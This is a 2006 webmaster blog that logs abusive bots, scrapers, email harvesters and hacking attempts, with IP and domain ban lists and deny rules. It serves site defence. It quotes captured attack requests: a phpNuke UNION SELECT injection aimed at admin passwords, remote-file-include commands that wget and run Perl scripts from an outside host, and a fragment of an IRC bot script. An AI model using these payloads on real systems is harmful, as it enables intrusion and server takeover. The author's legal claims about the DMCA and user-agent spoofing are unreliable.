Sep 29, 2006

Web Scrapers Violate the Digital Millennium Copyright Act

The Digital Millennium Copyright Act makes it a crime to create software
that allows a user to get around any copy protection used to stop
theft of copyright content.

Companies that create bots that fake useragents to get around our blocks
violate the DMCA.

We need a class action lawsuit against these software authors that create Web Scrappers.

geosign-v47.fibrewired.on.ca abuse unknown bot

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

Robot fakes useragents.
Loads the robots.txt file and then loads files it is told not to.
Has fallen into the bot trap several times.

This bot holds this IP and is hosted on fibrewired.on.ca
Canada

added to domain ban

geosign-v47.fibrewired.on.ca,Unknown Canada bot

static.theplanet.com kostanay spam

ThePlanet is offering internet access to businesses so we have to be carefull about banning that domain.

Verified robots list that need to be banned

70.86.137.162
a2.89.5646.static.theplanet.com


Update I am fed up with this bot its trying to place orders on my store using only a name and city. And is copying all the keys off the pages.
92.3f.5746.static.theplanet.com 70.87.63.146
name : alex
city : kostanay

So everything from static.theplanet.com is now banned.

name=ahmet
city=kostanay
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)
70.87.63.146 92.3f.5746.static.theplanet.com

reversedns.resolve.ru abuse

NO AGENT-
72.36.245.205 72.36.245.205.reversedns.resolve.ru

Resolve Ltd. is a Russian hosting company which appears to be involved in fraud schemes. A search on the ip address will return a lot of spammed guestbooks, mostly for pills. Apparently the spammer specialised on targetting the Advanced Guestbook script. The bot is using both random user agents and proxy servers and the referrer pointed to the domain hitairfare.com.

This robot was caught scanning with no agent which is automaticaly blocked. To prevent entry by any of its other fake agents the domain needs to be added to the domain block list.

reversedns.resolve.ru,guestbook spam and Fraud

Sep 27, 2006

Just what is btcentralplus.com

We receive a lot of abuse from this domain and a lot of webmasters are blocking it.
But since the domain has no website it was not clear what it was.
After a long search I have discovered that its British Telecom DSL.
See DSL report page. This was the only site that told what it was.

Why the lame tecs at BT dont have a website at that domain is confusing because not knowing what it is is getting BT customers globaly banned.

btcentralplus.com should not be banned as it is a ISP
It is not clear yet if dsl modems keep the same IP so we have to ban by IP until we know.

To the folks at BT Please put a website at www.btcentralplus.com

Sep 25, 2006

necbot/1.0 (nec labs america)

necbot/1.0 (nec labs america)
All Hits From svext.nec-labs.com 138.15.10.10

I can find no info on this bot.

The IP is registered to NEC but its confusing as to why NEC has a bot. This might be banned later as we are not sure what it is.

OrgName: NEC Laboratories America, Inc.
OrgID: NLA-29
Address: 4 Independence Way
Address: Suite 200
City: Princeton
StateProv: NJ
PostalCode: 08540
Country: US

geosign-v47.fibrewired.on.ca bad bot

First the bot falls into a bot trap it found from reading the robots.txt file.
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

Just to make sure it hots the bot trap again with another useragent
mozilla/4.0 (compatible; msie 5.0; windows xp) opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca


Then it tries to scan the site. Note how its user agent changes as it scanns.

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

This one gets stoped by BB as improper headers
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

Stoped by BB
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

It just keeps hammering like this but never gets in.

SO what is this bot doing?

Sep 24, 2006

baiduspider bad bot ignores robots.txt

baiduspider+(+http://www.baidu.com/search/spider.htm)
202.108.11.106
202.108.11.108
60.28.17.43

This is a china search system that indexes sites writen in chinese I think.
Since my sites are in english I don't understand why its trying to index me.

It says to add "baiduspider" to your robots file. I did this months ago but its back.
It is ignoring the robots.txt file.

The above IPS are in the blacklist as spammers. See link. You hace to click on OPEN RBL and then when the second window opens click on LOOKUP this will display all the block list in red.


It has been added to the useragent ban list and is blocked but it just ignores the
eror and keeps comming abck. Its time to add the IPS to the Server IP ban.

deny from 202.108.11.106
deny from 202.108.11.108
deny from 60.28.17.43

More work needed to find all its ips.

64.34.173.76 lucy.electroclash.us BOT

Mozilla/7.0
64.34.173.76 lucy.electroclash.us

What is this Mozilla 7 thats invalid. Some kind of bot. The website has what looks like a guestbook on its frontpage.

It hit 2 of my domains and was stoped by BB as invalid.

compatible; MSIE 6; Win32; Mck IS it a new bot?

User-Agent claimed to be MSIE- with invalid Windows version

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)

What is this useragent? It first looks ok stating
compatible; MSIE 6.0; Windows NT 5.1;
But then has a second part that which looks like the useragent is starting over.
Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)
Inside this strange string is another browser version.
compatible; MSIE 6; Win32; Mck

What is MSIE 6 This is invalid
What is Win32 this is also a invalid version
What is Mck
Why is Mozilla/4.0 repeated?

If this is not some strange proxy then this is a new bot.

This is banned by BB as a invalid windows version.

88.198.38.230 proxy.adressendeutschland.de harvstor

www.adressendeutschland.de
88.198.38.230 proxy.adressendeutschland.de

This bot is a Spammers dream. It is creating a database of all websites
NAME ADDRESS PHONE# & EMAIL ADDRESS Once finished it will have a search option to look up the data.

This is why you should not post your name address and phone# on your website. Give this data only to customers who place orders. Or require a customer to have an account before its displayed. New customers only need a contact form.

It claims it will not display anyone not in a "Trade Register" don't know what that is but if its true why are they scanning non business websites?

Read the translation of what they are doing here.

Email/Contact info Harvestor.

Sep 20, 2006

hostnoc.net abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
83 hits From 6419136165.hostnoc.net 64.191.36.165

The above is one of the suspected useragents that always turnes out to be a robot and not a browser. A search of google shows a lot of abuse from this domain so its banned.


domain ban list

hostnoc.net,pro spam host

Sep 19, 2006

LWP::Simple/5.48 FastCounter Robot using LWP

LWP::Simple/5.48
204.71.191.109

The bcentral FastCounter sends out a robot to check your link and verify your site. However this robot doesn't have its own useragent it uses "LWP::Simple/5.48" which is banned by most everyone is a spambot.

Atempts to report this failed because both the chat and email contact forms do not work on the fc.bcentral.com site. I also just discovered that FastCounter free is no longer free unless you had already created your counters before 2005 I have about 15 such counters so mine are still working.


If you have trouble with your counters not working you will have to add the above ip to the whitelist.

Just what is blogslive - Admitted Data-Minner

blogslive (info@blogslive.com)
64.158.138.84 floodgate.intelliseek.com

Blogslive will visit your blog the same day you create it.
The blogslive.com is just a godady parked webpage no such site exist.
The website intelliseek.com also does not exist it redirects to nielsenbuzzmetrics.com

To quote this website.
With solid data-mining technology, superb research and Nielsen’s unrivaled experience in media measurement and client services, we help today’s companies, brands and business professionals better understand the influence and impact of CGM on products, issues, reputation and image.


So the blogslive is what I suspected all along its a fake robot for nielsenbuzzmetrics.com used to data-mine your website so they can sell your content to others. Can you say copyright violation?


Banned Banned Banned....................

64.233.182.136 fakes google

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)
64.233.182.136


This IP was caught faking the google proxy which is banned because anyway because its a proxy.

Sep 17, 2006

enmaxenvision.net dragonfly bot

dragonfly(ebingbong@playstarmusic.com)
72.29.233.186 a72-29-233-186.enmaxenvision.net

enmaxenvision.net rdirects to enmax.com enmax has something to do with utilities cant tell what they are but they and not a ISP and should not be running a robot.

Both the domain and useragent should be banned.



enmaxenvision.net,Email harvestor

stpxc02.sentechsa.net spam tool

isc systems irc search 2.1
168.210.90.181 stpxc02.sentechsa.net

Caught this spam harvestor running on a domain that has no website.



Add to domain ban
sentechsa.net,Spam Email Harvestor

wmstream.libertyleague.com SpamBot

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
69.41.171.138 wmstream.libertyleague.com

This is a MLM company. Could not find any tracks in google must be a new spambot they have started up this week.


This domain should be added to the ban list.

I do see a court setelment on pyramid marketing here

Domain ban
libertyleague.com,MLM co running Unknown Bot

Sep 13, 2006

ns1.downriterotten.com abuse

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
72.232.31.82 ns1.downriterotten.com

Yes the above useragent is one of the known spam tools.
This domain has a page saying they will be back up soon while a google of the domain shows posting on adult webmaster forums.

This domain is banned for using spam tools.



downriterotten.com,Caught using spam tools

Sep 12, 2006

trishuli.cs.UMBC.EDU spambot

Java/1.5.0_02
130.85.94.152 trishuli.cs.UMBC.EDU

This is known spam software use to harvest email addresses.
It is running in the Computer Science Dept of the University of Maryland.

This has been reported.

static.88-198-43-39.clients.your-server.de bot

88.198.43.39 static.88-198-43-39.clients.your-server.de

From Germany has no agent.


Its not clear what this bot is trying to do. Its always on the same IP and only hits the top page.

dynamic.apogeenet.net Guestbook Spammer

ADD Spam robot Trap
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
64.192.20.104 dynamic.apogeenet.net

After doing a search I see that this domain often turns up on guestbooks posting spam so this domain is now added to the domain block.

dynamic.apogeenet.net,Guestbook Spammer

IRLbot/2.0 bot banned

Request : /contact.html
IP : 128.194.135.81
Agent : IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)

This bot didn't make it into the site it went straight to a old contact form that had been removed due to spam and hit it 7 times.


This bot was banned long ago for being a waste of bandwidth being that it only takes our bandwith and gives nothing back.

To quote the website.
"Texas A&M research project sponsored in part by the National Science Foundation that investigates algorithms for mapping the topology of the Internet and discovering the various parts of the web."
Thats great and all but Texas A&M needs to use its own bandwidth for this project and not ours.

Mozilla/5.0 Agent by itself

Agent: Mozilla/5.0
218.209.235.203
Agent: Mozilla/5.0
195.42.75.75
Agent: Mozilla/5.0
203.153.45.50

As you can see the same bot hit from 3 places one after another.

I have seen this before being used by the hackers it is clearly some type of hack tool or script.

To prevent false alarms this can not to be added to the useragent ban list it must be hard coded in as an exact match which will be done in the next release of MMAUTOBAN. v3.3

Sep 11, 2006

sproose/0.1 (the Sproose Goose bot)

GET HTTP/1.0
Agent: sproose/0.1 (sproose bot; http://www.sproose.com/bot.html; crawler@sproose.com)
from Ips
38.100.225.7
38.100.225.8
38.100.225.12
Most likely others but we are not keeping track.

Free Image Hosting at www.ImageShack.us

The Sproose Goose is banned because its a startup with no content. Scrappers often use the fake startup scam to get past blocks. Unless the sproose goose actualy does fly. They will stay banned. Right now we do not know if this is a real company or a scraper.

Robot was caught following links it should not be able to see because its banned. Ony way it could be doing what its doing is if it were following google listings back to our site.

Added to UA Start file
sproose/0.1,Fake Startup co

Sep 9, 2006

201.200.22.146 Hacker

ADD ALARM: */select/* injection
modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0-0-pwd-0-aid/**/FROM/**/nuke_authors GET HTTP/1.1
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; simbar enabled; simbar={ff31d371-c0bf-4f98-ac32-ccaee7d5f828})
201.200.22.146

The above atempted union injection hack of the phpnuke database was detected and the ip autobanned by M&M Autoban.



One wonders why I am seeing a lot of hackers with simbar enabled in the user agent.
None of my regular visitors have simbar.

Sep 7, 2006

microsoft.com spoofed?

Blacklist Domain Ban: microsoft.com Entire range spoofed by hackers
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; wow64; sv1)
131.107.0.96 tide526.microsoft.com

Word is that someone is using microsoft ips.

One would think MS would be using msie 7 if it was real.

Update I started seeing what looked like valid users so this domain was removed from the ban list but is being watched.

Bad Behaivor Whitelist adjustment

Bad behaivor has some problems with known good bots. You need to adjust your whitelist to let them in.

edit the whitelist.php and change the $bb2_whitelist_ip_ranges to.

$bb2_whitelist_ip_ranges = array(
// Looksmart
"64.242.88.60",
// Scooter/3.3
"66.94.232.246",
"66.94.238.51",
"66.94.238.52",
// YahooSeeker/1.2
"68.142.230.184",
// FreeFindRobot Good bot with some header problems
"63.203.65.217",
// CJ.com banner tester
"216.34.209.23",
);

These are known bots that BB blocks due to header problems. Without this change altavista scooter will not be able to index your site.
CJ.com has been added because the new robot they use is blocked as a spambot.

security.lightspeedsystems.com abuse

bad-behavior 400 Required header 'Accept' Missing.
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
66.17.15.154 66-17-15-154.security.lightspeedsystems.com

Thought to be a scrapper. See other info here

Reports now say that this is content filtering.
lightspeedsystems.com
If it is its the worst bot ever writen because it fakes its useragent and sends ilegal headers. Clearly not the tec leaded it says on the website.

Writing to lightspeed and waiting for a reply.

Update:
lightspeedsystems.com refuses to reply to my emails so its banned I don't care what they say it is. It is abuse because they are faking the useragents and are using improper headers and they do not identify themselves in the scan.


added domain ban
lightspeedsystems.com,Wont reply to emails abuse

Also banned by all blogs using Bad Behavour

Sep 6, 2006

nat.la.valueclick.com Java/1.5.0

Java/1.5.0_06
64.70.54.15 nat.la.valueclick.com
cjnetworkquality; http://www.cj.com/networkquality
64.70.54.15 nat.la.valueclick.com

Java/1.5.0_03
216.34.209.23 mx4.cj.com

Valueclick and cj.com are the same company. It is unclear why they are using this useragent. This useragent is blocked as a known spam tool they should not be using it.

This has been reported to valueclick and cj.com.

UPDATE
after 1 month CJ sent this reply to the problem of a broken useragent string.

For further details, regarding our Network Insight Spider, please access the following URL:
http://www.cj.com/networkquality/


Well....... Hummm what am I to say to that answer?

And people wonder why customer service people have a bad rep.

What to do.
This looks like a legit bot that needs to be let in, however cj would not reply if it was the real cj bot or not.
The ip needs to be added to the whitelist in BB and M&M Autoban however I have not seen it this month so it may be fixed. Will have to wait and see.

But anyway no point in writing to them again all they game me after 1 month was the URL thats in the normal useragent string.

How to protect your site

Protect your website in realtime.
As seen on PC Magazine

Protect your PHP site and scripts from bad abusive robots that use up your bandwidth.

Have you checked your logs only to find you have more robot or unknown users than you have real visitors.

Examples of what is visiting your site
Robots watching to see if your domain expires
Robots from some startup search engine no one will ever use
Robots from search engines in languages you dont serve
Robots from companies trying to see if you volated some copyright
Robots from some government website monitoring for some unknown content
Robots trying to collect email addresses
Robots trying to hack into your site
Robots pinging your scripts in an atempt to get your software to list they came from
Robots probing for scripts called modules.php posting.php submit.php and others
Robots using random agents to avoid blocking.
Hackers trying to use union injections on your database

Copyright owners have the legal right under the DMCA to reserve the right to view content only to website visitors. Webmasters have the legal right under DMCA to block access to anyone who wants to store or copy website content. It is also a crime under US law to use any trick or false information to gain access to a computer system. Running a robot that pretends to be a user by faking its useragent is crime under US Law because it is using false information to gain access to a computer system.


M&M Autoban can be used as a Bot-Trap to autoban every ip that hits a trap listed in your robots file. It is included in all of your php scripts to check the user against the ip ban list and then verify that the visitor qualifies to visit your website.

You can not just send spam bots into a endless fake email loop unless you have unlimited bandwidth and you don't care about a slow server. And it doesn't hurt them anyway. A spam bot must be terminated ASAP with as little bandwidth being used as possible.


Works with Bad Behavior but BB is not required.

Works on all PHP scripts needs no database!
Prevents Union Injections and known hacks.
Tracks agents
Set blocking list anyway you like

Now works With Wordpress.

Clich on downloads to the right.

csccorporatedomains.com abuse Corp. Snooper

Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.107 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.126 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)
64.124.14.126 csccorporatedomains.com
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040218 Galeon/1.3.12
64.124.14.120 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.120 csccorporatedomains.com
Mozilla/5.0 (compatible; Konqueror/3.1; Linux; en)
64.124.14.120 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)
64.124.14.120 csccorporatedomains.com

All of the above were blocked by bad-behavior as having defective headers.
Only 1 old win85 bot gets past BB but is blocked by our domain ban.
mozilla/4.7 [en] (win95; u)
64.124.14.120 csccorporatedomains.com
mozilla/4.7 [en] (win95; u)
64.124.14.124 csccorporatedomains.com


This has now all been tracked back to a service called "Brand Audit and Patrol" it visits our sites to see if we are saying bad things about brand names. And to check if we have brand logos.

Problem is that they are using a defective robot that is blocked by all blogs that use Bad behavior. Its likely that this patrol bot can not even see 60% of all the blogs its trying to scan due to poor programming.

Also this robot fakes useragents to gaining access to websites in violation of US federal law. Which makes it a crime to use false information and or any trick to gain access to a computer system.

This domain is banned for wasting bandwith and using false information and tricks to gain access to website content.

csccorporatedomains.com,brand audit patrol

ip.secureserver.net Funny

64.202.160.65
Blacklist Domain Ban: ip.secureserver.net Godady web hosting -
Unknown bots
http://www.google.com/search?hl=en&q=robot+blocking+scripting

Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr
1.1.4322)

Domain: nat-64-202-160-65.ip.secureserver.net


secureserver.net doesn't have a website it redirects to
http://www.securepaynet.net/gdshop/404error.asp which is godady
payment service.

How does someone run Windows on a godady server. They dont its a bot
and its scanning for info on who is blocking bots, Funny. What does this
tell you.

We were banning just part of this domain but now suggest banning the
entire thing.



secureserver.net,Godady web hosting - Unknown bots

Panscient Data Services

38.99.203.110 Panscient_Data_Services.demarc.cogentco.com

Orginaly the bot was detected scanning the site using a fake useragent. This was reported to cogentco.com who sent back a canned reply that this was a nice bot and followed robots file.

My orginal request for info on who ran the bot and why it was faking a useragent of a browser were ignored.

I replied back to abuse and asked if cogentco.com owned this bot and why it was using a fake useragent if it was a nice bot. But my questions were ignored and all I got back was the same canned reply.

cogentco.com knows about this bot, allows it to operate, hides the idenity of its owner and ignores complaints about it.

This bot was built by www.panscient.com it is unclear if they own it.

At Panscient Technologies we design, build and operate custom internet search engines that unlock the hidden structure of web data.
Using state of the art AI technology, Panscient Technologies' software analyzes web sites for their information content and compiles the data into a searchable index.


Yea right state of the art scrapping.

At this time it is unclear who else uses this bot because its stealth.

Add to domain ban list
Panscient_Data_Services.demarc.cogentco.com,Abuse

or to the ip ban on your server 38.99.203.110

nodomaintransfer21.com Singapore peepsurf.com

NO AGENT-
66.139.76.245 nodomaintransfer21.com

This domain redirects to peepsurf.com which is a proxy. Since the url being atempted was one that spammers hit I suspect they were trying to get by my blocks. I don't know why the spam never gets posted even when they get past the block. Lammers....

I tested this proxy by taking it to the bot trap and got this.

210.193.49.199 199.210-193-49.idc-colo.qala.com.sg It passed my useragent.

I can not tell where they got the nodomaintransfer21.com from it did not come from that proxy must be running more than one both need to be banned.

See post on guestbook spammer running on nodomaintransfer22.com

Domain Ban.
idc-colo.qala.com.sg,Singapore peepsurf.com proxy
nodomaintransfer21.com,Singapore peepsurf.com proxy

Union Injection hackers

Ever since I posted on my new anti union injection module hackers have been trying to hack my forums. Someone tell me something. Perhaps I don't usderstand this but why would a hacker show me just how he hacks a site so I can take that info and adjust my script to block such hacks?

All his atempts were blocked even by my alpha script.

modules.php?basepath=http://paupal.info/folder/cmd1.gif?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo1.txt;perl%20mambo1.txt;rm%20-rf%20mambo1.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://expl0itz.com/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch


hypernet.ch is banned

Here is part of his IRC script code.
my $linas_max='4';
my $sleep='5';
my @adms=("xxxxx","ok","mos","KKTeam");
my @canais=("#phpnuke");
my $nick='shutup';
my $ircname ='Stop';
chop (my $realname = 'uname -rs');
$servidor='mushu.tetovalive.de' unless $servidor;
my $porta='8200';

sitescripts.com link checker

sitescripts.com link checker
66.113.130.183 lsh158.siteprotect.com

This bot looks like its using a link checker downloaded from sitescripts.com

I think this is a scrapper whatever it is its pretending to be sitescripts.com

siteprotect.com has no website so its suspent right out of the box.

Its banned by agent and domain.

coli.uni-saarland.de / answerbus bot

This bot first came in using a agant for a text browser. Clearly fake.

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.226 cluster-7.coli.uni-saarland.de

After a week they changed user agents to.

answerbus (http://www.answerbus.com/)
134.96.1.195 answerbus.coli.uni-saarland.de

Now they are back to using a fake text browser agent. Perhaps its 2 bots.
lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.221 cluster-2.coli.uni-saarland.de

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.220 cluster-1.coli.uni-saarland.de



It often came in with refers that tracked back to its scraper site.
134.96.1.195 answerbus.com answerbus.de uni-saarland.de

All of these websites have the same thing on them. it looks like a search system and even says "supported by research grants from ....." I dont know if thats true if it is they should ask for the money back. Unless they support scrappers?

I tested this search system using my keywords for my sites and what I found were listings with my text and site name that looked like they were links to my site but when clicking on them I was taken to other scrapper linking sites.

This thing is banned by domain and user agent.


Update bot getting very active suggest adding to server ip ban

deny from 134.96.104.226
deny from 134.96.104.221
deny from 134.96.104.220
deny from 134.96.1.195

blogsearchbot-pumpkin-2

blogsearchbot-pumpkin-2 GET HTTP/1.0
85.10.211.195 85-10-211-195.clients.your-server.de

I don't know what pumpkin is but its banned.

They say it doesn't read robots I dont care with no ideal what it is its banned.

Sep 5, 2006

upc-a.chello.nl abuse

wells search ii
62.163.12.132 a12132.upc-a.chello.nl
wells search ii
62.163.32.222 a32222.upc-a.chello.nl
wells search ii
62.194.120.227 h120227.upc-h.chello.nl



Have been seeing a lot of this Spam Harvestor running on chello.nl

Also turned up at chello084112114199.33.11.vie.surfer.at

This is a known spam harvestor.

SuperCleaner 2.84

What is useragent
Mozilla/4.0 (compatible; SuperCleaner 2.84; Windows NT 5.1)

SuperCleaner 2.84 is a disk cleaner so why is it trying to visit my site?
24.147.48.201 c-24-147-48-201.hsd1.ma.comcast.net


Bad behaivor is blocking it due to incorrect format.

Unless I can find out what SuperCleaner 2.84 is it will be added to the block list.

Welcome

Welcome to the new Blog. I had to move from the forum over to here because of all the atempts to hack the forum software.

All the old post from the forum had to be purged so I could get them out of the gogle index.

I will atempt to repost the major ones here.